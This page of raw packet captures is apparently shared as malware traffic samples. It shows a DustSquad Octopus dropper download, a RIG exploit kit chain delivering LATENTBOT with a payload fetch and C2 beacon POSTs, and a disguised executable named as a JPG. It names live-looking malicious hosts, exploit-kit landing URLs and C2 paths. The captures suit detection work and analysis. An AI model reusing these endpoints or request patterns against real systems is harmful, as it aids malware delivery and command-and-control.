IX……P…….RP….k……..
2018-11-06 03:09:11.866394 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [F.], seq 325, ack 241, win 1026, length 0
E .(..@./…….
.
I.P..8…….P………….
2018-11-06 03:09:11.866628 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 326, win 255, length 0
E..(!.@…u.
.
I…….P….8…P………….
2018-11-06 03:09:11.869397 IP 10.1.10.73.65491 > 88.198.204.196.80: Flags [P.], seq 1:239, ack 1, win 256, length 238: HTTP: GET /d4.php?check HTTP/1.1
E…..@….Q
.
IX……P…….RP…….GET /d4.php?check HTTP/1.1
Host: 88.198.204.196
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.995486 IP 88.198.204.196.80 > 10.1.10.73.65491: Flags [.], ack 239, win 123, length 0
E .(=E@.0…X…
.

I.P…..R….P..{……….

.
IX……P..q…………………….
2018-11-06 03:09:13.175672 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [S.], seq 1943939956, ack 4008735111, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.0…X…
.
I.P..s.+t..q…9..3…………..
2018-11-06 03:09:13.175994 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [.], ack 1, win 256, length 0
E..(..@….;
.
IX……P..q.s.+uP…u………
2018-11-06 03:09:13.193802 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [P.], seq 1:241, ack 1, win 256, length 240: HTTP: GET /d4.php?check HTTP/1.1
E…..@….J
.
IX……P..q.s.+uP…….GET /d4.php?check HTTP/1.1
Host: www.runa-ldn.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:13.314178 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [.], ack 241, win 123, length 0
E .(.I@.0.k.X…
.

I.P..s.+u..rwP..{t………

.
Ihv.6…P..w…………………….
2018-11-06 03:09:44.234391 IP 104.118.190.54.80 > 10.1.10.73.65508: Flags [S.], seq 565809931, ack 3247929270, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.8…hv.6
.
I.P..!…..w…r……………..
2018-11-06 03:09:44.234657 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [.], ack 1, win 256, length 0
E..(Y6@…f.
.
Ihv.6…P..w.!…P………….
2018-11-06 03:09:54.671156 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
E…Y7@…e.
.
Ihv.6…P..w.!…P…….POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: /
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:09:54.672196 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP

E..YY8@…fp

I
.
d…..\
.)~..P………….
2018-11-06 03:10:22.717526 IP 10.1.10.73.65527 > 10.1.10.100.55555: Flags [P.], seq 1:580, ack 1, win 2053, length 579
E..kLW@…..
.
I
.
d…..\
.)~..P…9…GET /apt/DustSquad/OctopusTelegramMessengerDropper.bin HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:10:22.717734 IP 10.1.10.100.55555 > 10.1.10.73.65527: Flags [.], ack 580, win 238, length 0

E .4.?@.m…%..)
.
I._….mvF.w…q .t…………..
2018-11-06 03:11:34.409113 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0
E..(.A@….(
.
I%..)…_F.w…mwP…pb……..
2018-11-06 03:11:34.409705 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [P.], seq 1:140, ack 1, win 256, length 139
E….B@…..
.
I%..)…_F.w…mwP….f..GET /catalogs/cdns?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: /

2018-11-06 03:11:34.413491 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [S.], seq 1499628406, ack 606991932, win 28960, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E .4.@@.m…%..)
.
I...Yb.v$-.<..q ……………. 2018-11-06 03:11:34.413719 IP 10.1.10.73.49183 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0 E..(.C@….& . I%..)…$-. 37.244.26.41.1119: Flags [P.], seq 1:144, ack 1, win 256, length 143
E….D@…..
.
I%..)…_$-.<Yb.wP…m…GET /catalogs/versions?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: /

2018-11-06 03:11:34.503109 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [P.], seq 123:676, ack 144, win 4380, length 553
E .Q…….w%..)
.
I._..Yb..$-..P…./..Region!STRING:0|BuildConfig!HEX:16|CDNConfig!HEX:16|KeyRing!HEX:16|BuildId!DEC:4|VersionsName!String:0|ProductConfig!HEX:16

## seqn = 57858

.
I.23..4.PQ[K……….J…………..
2018-11-06 03:12:14.326073 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [S.], seq 1417380829, ack 1364937650, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.8..`.23.
.
I.P.4T{..Q[K…r.g……………
2018-11-06 03:12:14.326386 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [.], ack 1, win 256, length 0
E..(UF@…FF
.
I.23..4.PQ[K.T{..P………….
2018-11-06 03:12:14.332421 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [P.], seq 1:83, ack 1, win 256, length 82: HTTP: GET /ncc.txt HTTP/1.1
E..zUG@…E.
.
I.23..4.PQ[K.T{..P…….GET /ncc.txt HTTP/1.1
Host: ncc.avast.com
User-Agent: Avast NCC
Accept: /

2018-11-06 03:12:14.350954 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [.], ack 83, win 229, length 0
E .(..@.8..d.23.
.
I.P.4T{..Q[L.P….n……..

2018-11-06 03:12:14.351729 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [P.], seq 1:152, ack 83, win 229, length 151: HTTP: HTTP/1.1 200 OK

.P.6@…p.P………….
2018-11-06 03:13:14.499210 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 4535:4877, ack 302, win 3, length 342: HTTP
E .~R.@.-.m.M.*.
.
I.P.
..p..6@.P…;3….b.a+?…….u…P…..g….B`/f..y.&.L..c./….^(..y.N$….RG……J/…………..D….[s..U..@.GF9PFSFan.n….DiA..|…..{…Q…….%C..w._<!…..c=…o..^#v6..J………..J..B.-..2….P……….L…o8…….-iPp.G.C2X.^J..y.
.{.1…PA….8′..3l.Z.I……..-…B…iDN..Z….”.v…(-…y..$……w..B.E…^…..j…#…..ASWSig2B
0

2018-11-06 03:13:14.516560 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 302:604, ack 4877, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
E..VL.@….~
.
IM.*..
.P.6@…q.P…….GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:13:14.589588 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 604, win 4, length 0
E .(R.@.-.nqM.*.

.

IM... .P.6A…..P…o……… 2018-11-06 03:17:59.378603 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 9411:9771, ack 604, win 4, length 360: HTTP E ..R.@.-.m.M..
.
I.P.
…..6A.P….”..}.; …./..K”..<..@Hu-……=…#.5.J……..M.<.0i…..:…..*…g….gDV.{=.F……[…zfAr…I%.t…………Ux..C………..,+…|T.[.f…..>.(‘.’)7.B..+…7………^…q…..z…L……..%..c.KF. k..w_.…..0(.…H..:.=h].c…U……7Pk.Q..w1…e…,:.o.n.d.8.5…s1_=(…?|> 3..b$t.e.+…d%X.9..yp.J.dN’..P}Mv…y?.k.aS.r|.8U.rs……tASWSig2B
0

2018-11-06 03:17:59.396393 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 604:906, ack 9771, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
E..VL.@….{
.
IM.*..
.P.6A…..P…rk..GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:17:59.471625 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 906, win 4, length 0
E .(R.@.-.nkM.*.

.

.
Ihn.…P………………………. 2018-11-06 03:20:48.497232 IP 104.110.209.95.80 > 10.1.10.73.49426: Flags [S.], seq 1611496151, ack 3370241501, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0 E .4..@.8…hn.
.
I.P...z.......r.{............... 2018-11-06 03:20:48.497541 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [.], ack 1, win 256, length 0 E..(U.@...V. . Ihn._...P.....z.P…-………
2018-11-06 03:20:48.498451 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
E…U.@…V.
.
Ihn._…P….`.z.P…<“..POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: /
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:20:48.498498 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP
E..YU.@…V.

RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
E..(A.@…”m..
.6……P…S….P.@[.G..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
E..( L@.1…6…..

..R.4…P.X{./k..P.@[&i……..
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
E…Kl@…gf..
..R.4…P.X{./k..P.@[.’..GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

..R.4…P.X}./k..P.?[.x……..
2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
E…L4@…e…
..R.4…P.X}./k..P.?[.?..GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
E…MH@…e…
..R.4…P.X.T/l..P.@U!…GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
E..(+.@.:….R.4..
..P../l…X..P. …..

….l.%.P~…..+@P.@[……….
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…N.@…RD..
….l.%.P~…..+@P.@[.x..GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
E..NE!@.y.cv…l..
..P.%..+@~…P..0….HTTP/1.1 200 OK
CONTENT-LENGTH: 0

….l.%.P~…..+fP.@Q……….
2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
E..4N.@…P…
….l.%.P~…..+fP.@Qw…GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
E..rE)@.y.cJ…l..
..P.&.t.v…%P…….HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

….l.(.P……..P.@[B………
2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
E..#N.@…Q…
….l.(.P……..P.@[….GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
E..rE/@.y.cD…l..
..P.(……..P…….HTTP/1.1 200 OK

R..N…P.@[.\……..
2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…O8@…Q…
….l.*.P
R..N…P.@[K…GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

….l.4…U….M.P.>^.*..POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

.9.^v…r1jk….~…e….e..!i
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
E..(Tp@.y.TM…l..
….4..M..U.#P../ue..
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
E…V.@…JT..
….l.3…..]…6P.=.M…POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

@….+..9.hE…..RZ…..l.#UV….Mk<…2.jcg.^.
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
E.._Tu@.y.T….l..
….3…6….P..b.#..HTTP/1.1 200 OK
CONTENT-LENGTH: 16

.A*..6J……..x

E…V.@…JR..
….l.3………mP.=…..POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45

W32/Felix Iran APT/Malware Fake JPG senario104.jpg Binary PCAP file download Traffic Sample

Unknown IRAN fake image binary file

file senario104.jpg
senario104.jpg: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

 

2016-10-23 01:32:16.438427 IP 192.168.1.102.58937 > 79.127.127.67.80: Flags [P.], seq 0:297, ack 1, win 64240, length 297: HTTP: GET /senario104.jpg HTTP/1.1
E..Q(R@…@….fO..C.9.P.R(.V…P…….GET /senario104.jpg HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: limlim00000.rozup.ir
Connection: Keep-Alive


E..((|@…A….fO..C.<.P……;NP…’………
2016-10-23 01:32:55.262559 IP 192.168.1.102.58940 > 79.127.127.67.80: Flags [P.], seq 0:203, ack 1, win 256, length 203: HTTP: GET /favicon.ico HTTP/1.1
E…(}@…@….fO..C.<.P……;NP…/a..GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: limlim00000.rozup.ir
Connection: Keep-Alive